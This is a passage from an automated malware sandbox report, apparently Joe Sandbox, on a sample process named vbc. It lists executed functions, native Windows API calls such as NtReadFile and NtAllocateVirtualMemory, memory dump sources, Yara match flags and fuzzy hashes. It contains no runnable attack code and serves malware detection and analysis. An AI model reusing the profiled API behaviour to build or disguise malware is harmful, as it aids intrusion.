96951 41af20 LdrLoadDll 96949->96951 96954 5c82f30 LdrInitializeThunk 96950->96954 96951->96950 96952 40f4ee 96952->96790 96952->96791 96954->96952 96955->96796 96956->96801 96957->96806 96958 5c82ad0 LdrInitializeThunk

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID: !JA$bMA$bMA
                                                                                                                                                  • API String ID: 2738559852-4222312340
                                                                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                                                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                                                                                  Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 252 40ace0-40ad09 call 41cc10 255 40ad0b-40ad0e 252->255 256 40ad0f-40ad1d call 41d030 252->256 259 40ad2d-40ad3e call 41b460 256->259 260 40ad1f-40ad2a call 41d2b0 256->260 265 40ad40-40ad54 LdrLoadDll 259->265 266 40ad57-40ad5a 259->266 260->259 265->266
                                                                                                                                                  APIs
                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Load
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                  • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                                                                                                                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                  • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                                                                                                                                  Function 0041A31B Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 267 41a31b-41a371 call 41af20 NtCreateFile
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 8f3e8a6209b4b00c98ddcbbd338c2fca887c2b184796bbc1a5fb50fcfb101bb5
                                                                                                                                                  • Instruction ID: 6af5a2f632afc800a517bcec4ba0904026498e808f2fa26a1e036ec25215fe71
                                                                                                                                                  • Opcode Fuzzy Hash: 8f3e8a6209b4b00c98ddcbbd338c2fca887c2b184796bbc1a5fb50fcfb101bb5
                                                                                                                                                  • Instruction Fuzzy Hash: 9601DDB2201208BFCB08CF98D895EEB77A9BF8C354F118209BA0993241C630E8118BA4
                                                                                                                                                  Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 270 41a320-41a336 271 41a33c-41a371 NtCreateFile 270->271 272 41a337 call 41af20 270->272 272->271
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                  • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                                                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                  • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                  Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 273 41a500-41a516 274 41a51c-41a53d NtAllocateVirtualMemory 273->274 275 41a517 call 41af20 273->275 275->274
                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                  • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                                                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                  • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                  Function 0041A4FA Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 279 41a4fa-41a53d call 41af20 NtAllocateVirtualMemory
                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: 5b9e2d1a5edd79be2a2d903e8bd7a354ba4826bc616cee076fd0fa7e3af18abb
                                                                                                                                                  • Instruction ID: 838264de32c343dc065a207e36573fb7d5625846ea2776db14e94fc7a3fc012b
                                                                                                                                                  • Opcode Fuzzy Hash: 5b9e2d1a5edd79be2a2d903e8bd7a354ba4826bc616cee076fd0fa7e3af18abb
                                                                                                                                                  • Instruction Fuzzy Hash: 99F01CB6200108AFDB14DF89DC55EEB77ADAF88354F154559FE099B241C630E821CBB4
                                                                                                                                                  Function 0041A44A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 44f4301a8312fb7a1a721bfc725db4469673ce8342a651448e83db7c9f097d31
                                                                                                                                                  • Instruction ID: d7bf46046ebde09780b79a3501cd22a4181f43e7f5ac81893e4249d29ed6ce1f
                                                                                                                                                  • Opcode Fuzzy Hash: 44f4301a8312fb7a1a721bfc725db4469673ce8342a651448e83db7c9f097d31
                                                                                                                                                  • Instruction Fuzzy Hash: A6E0C277240210AFD710EBE4DC45FD73BA8EF48728F154599BA589B352C234F94087D0
                                                                                                                                                  Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                  • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                                                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                  • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                                                                                                                                  Function 05C82DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: ea6db2784c0d7dc74fde34aafb9f192279ba2cc913be19b2e71a8031f7735759
                                                                                                                                                  • Instruction ID: 808d568b4cbac2c5156d71fc4bd2e9735c8668567cde485897e32bca5c7beb49
                                                                                                                                                  • Opcode Fuzzy Hash: ea6db2784c0d7dc74fde34aafb9f192279ba2cc913be19b2e71a8031f7735759
                                                                                                                                                  • Instruction Fuzzy Hash: 30900262242441525949B1584448507401697E16417D5C412A1418A50C89269956D626
                                                                                                                                                  Function 05C82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: a092505986dba87af60b1c437487aee0bc537f60de02cba7c0f1efad1c16da47
                                                                                                                                                  • Instruction ID: 50d6deea2bf6ae523e48afee3f1157474fb5a86ac7c35ad05b19d7de99486504
                                                                                                                                                  • Opcode Fuzzy Hash: a092505986dba87af60b1c437487aee0bc537f60de02cba7c0f1efad1c16da47
                                                                                                                                                  • Instruction Fuzzy Hash: 9190027220140413D51571584548707001987D1641FD5C812A0428658D9A568A52A126
                                                                                                                                                  Function 05C82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4ac67ab6269ee1707e1f406d60549c6dd33c9042df249cb30f808c3bb8989956
                                                                                                                                                  • Instruction ID: aa964ef03dfe610017fffb4690caceda8b0b31c9628e640f64ff8d76d3c46c7b
                                                                                                                                                  • Opcode Fuzzy Hash: 4ac67ab6269ee1707e1f406d60549c6dd33c9042df249cb30f808c3bb8989956
                                                                                                                                                  • Instruction Fuzzy Hash: 1390026A21340002D5847158544C60A001587D2602FD5D815A0019658CCD1589695326
                                                                                                                                                  Function 05C82D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 90e13749b7b67432d8771ff50feada2e701a522933e51a89df3354347eb954c6
                                                                                                                                                  • Instruction ID: 02ca9fcaff55034377b6b35033cc789fcaad08d1c6f9052789fbd81992b35f28
                                                                                                                                                  • Opcode Fuzzy Hash: 90e13749b7b67432d8771ff50feada2e701a522933e51a89df3354347eb954c6
                                                                                                                                                  • Instruction Fuzzy Hash: 6490026230140003D5447158545C6064015D7E2701F95D411E0418654CDD1589565227
                                                                                                                                                  Function 05C82CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 228db57c273855c5bf1b8abf58854674d7357ae065f938dfa80652f913af8122
                                                                                                                                                  • Instruction ID: a19eed0ac4957e0490a8bb4f693fc3e38d71d19e524ec5b10773b5bce83751c8
                                                                                                                                                  • Opcode Fuzzy Hash: 228db57c273855c5bf1b8abf58854674d7357ae065f938dfa80652f913af8122
                                                                                                                                                  • Instruction Fuzzy Hash: 2690027220140402D5047598544C646001587E1701F95D411A5028655ECA6589916136
                                                                                                                                                  Function 05C82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: e55122b8454afdbcb5d254faa60c289e558c5976fe7172c5012ac2d1b6cca7d5
                                                                                                                                                  • Instruction ID: af16db70e813ad41c28ffbe8d6355f5d30cfbf76bedad8833d15a33bebbff92a
                                                                                                                                                  • Opcode Fuzzy Hash: e55122b8454afdbcb5d254faa60c289e558c5976fe7172c5012ac2d1b6cca7d5
                                                                                                                                                  • Instruction Fuzzy Hash: 8D90027220148802D5147158844874A001587D1701F99C811A4428758D8A9589917126
                                                                                                                                                  Function 05C82FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: ccaf6a465d03aab5cb1624db85e9b8ae31fafce115579092f15e27c40acea2a6
                                                                                                                                                  • Instruction ID: 155e38ee39bceb342e811481fbca6b49fb294fa43d7d94b1bebc64bf9188e910
                                                                                                                                                  • Opcode Fuzzy Hash: ccaf6a465d03aab5cb1624db85e9b8ae31fafce115579092f15e27c40acea2a6
                                                                                                                                                  • Instruction Fuzzy Hash: 13900262211C0042D60475684C58B07001587D1703F95C515A0158654CCD1589615526
                                                                                                                                                  Function 05C82F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c03aeff020a98f23ba2a507bc179435071b8c17b32e77eaee426a83cfd37ea98
                                                                                                                                                  • Instruction ID: 17be67ea3c36e631545c2faa144f4ab7366ea6edc37bfb819743fde130feea63
                                                                                                                                                  • Opcode Fuzzy Hash: c03aeff020a98f23ba2a507bc179435071b8c17b32e77eaee426a83cfd37ea98
                                                                                                                                                  • Instruction Fuzzy Hash: 7690027220180402D5047158485870B001587D1702F95C411A1168655D8A2589516576
                                                                                                                                                  Function 05C82FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 7c43e90212b78d5ea94f730cca8571d8dec239fe9234d2f0f2e6ade82582b1dd
                                                                                                                                                  • Instruction ID: 3b711933bad9629d1bccd4b2c7e59b3e2ba790e113cfdb4e1a39796cc2b01be4
                                                                                                                                                  • Opcode Fuzzy Hash: 7c43e90212b78d5ea94f730cca8571d8dec239fe9234d2f0f2e6ade82582b1dd
                                                                                                                                                  • Instruction Fuzzy Hash: 8B900262601400424544716888889064015ABE2611795C521A099C650D89598965566A
                                                                                                                                                  Function 05C82F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: f3dc54447cf710d8f6fecd0dfaf59fae7e59b3a021ad5498301939192317209b
                                                                                                                                                  • Instruction ID: 85b5a3111344eaaeec1654c6fd17f443822b3ba58ddb9ecbe6457848c7840255
                                                                                                                                                  • Opcode Fuzzy Hash: f3dc54447cf710d8f6fecd0dfaf59fae7e59b3a021ad5498301939192317209b
                                                                                                                                                  • Instruction Fuzzy Hash: E59002A234140442D50471584458B060015C7E2701F95C415E1068654D8A19CD52612B
                                                                                                                                                  Function 05C82E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8410a451de8a36ff8f45c05d7d47505330eb77830eeca575c8a2e478fe2073ca
                                                                                                                                                  • Instruction ID: e3a8d202700b7c5bae718035108762779768c7a181e604a909b92bbae072e23c
                                                                                                                                                  • Opcode Fuzzy Hash: 8410a451de8a36ff8f45c05d7d47505330eb77830eeca575c8a2e478fe2073ca
                                                                                                                                                  • Instruction Fuzzy Hash: 5590026260140502D50571584448616001A87D1641FD5C422A1028655ECE258A92A136
                                                                                                                                                  Function 05C82EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9690150bdc4bda99abf8690304cd60b53b301006d817b9f530945bec714f0a24
                                                                                                                                                  • Instruction ID: 4d53d77d0f9b9136d0216adf34cfa9b4c82262dd21013190215ec433db4e0e35
                                                                                                                                                  • Opcode Fuzzy Hash: 9690150bdc4bda99abf8690304cd60b53b301006d817b9f530945bec714f0a24
                                                                                                                                                  • Instruction Fuzzy Hash: 9D9002B220140402D54471584448746001587D1701F95C411A5068654E8A598ED5666A
                                                                                                                                                  Function 05C82BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 60e40a5936e5fd2401465fb993061debd0c33565bd24ce7144bdd77fc29f31ee
                                                                                                                                                  • Instruction ID: f367e9ff1b9af18d0be60be2734ab7583ec364b9f7e41205fc9f35c69da81347
                                                                                                                                                  • Opcode Fuzzy Hash: 60e40a5936e5fd2401465fb993061debd0c33565bd24ce7144bdd77fc29f31ee
                                                                                                                                                  • Instruction Fuzzy Hash: C390027220140802D5847158444864A001587D2701FD5C415A0029754DCE158B5977A6
                                                                                                                                                  Function 05C82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: a0ffc14a8e2991e09b74a91846a5a9408c0529087396c4d02d020faf89003ce2
                                                                                                                                                  • Instruction ID: 4ef2442b7658658599a0cd96ba7a7c5f13a97e033262085e83bef142645d8ba6
                                                                                                                                                  • Opcode Fuzzy Hash: a0ffc14a8e2991e09b74a91846a5a9408c0529087396c4d02d020faf89003ce2
                                                                                                                                                  • Instruction Fuzzy Hash: 659002A220240003450971584458616401A87E1601B95C421E1018690DC9258991612A
                                                                                                                                                  Function 05C82AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9986d349b0e22c89251a1f4f170a0e82e9e96e81927ff0b0fa95b01c7f552fbd
                                                                                                                                                  • Instruction ID: d91cb254d30049a3ca67a2b821efcbb4f3dbd9468f21f990a4602dda388237d2
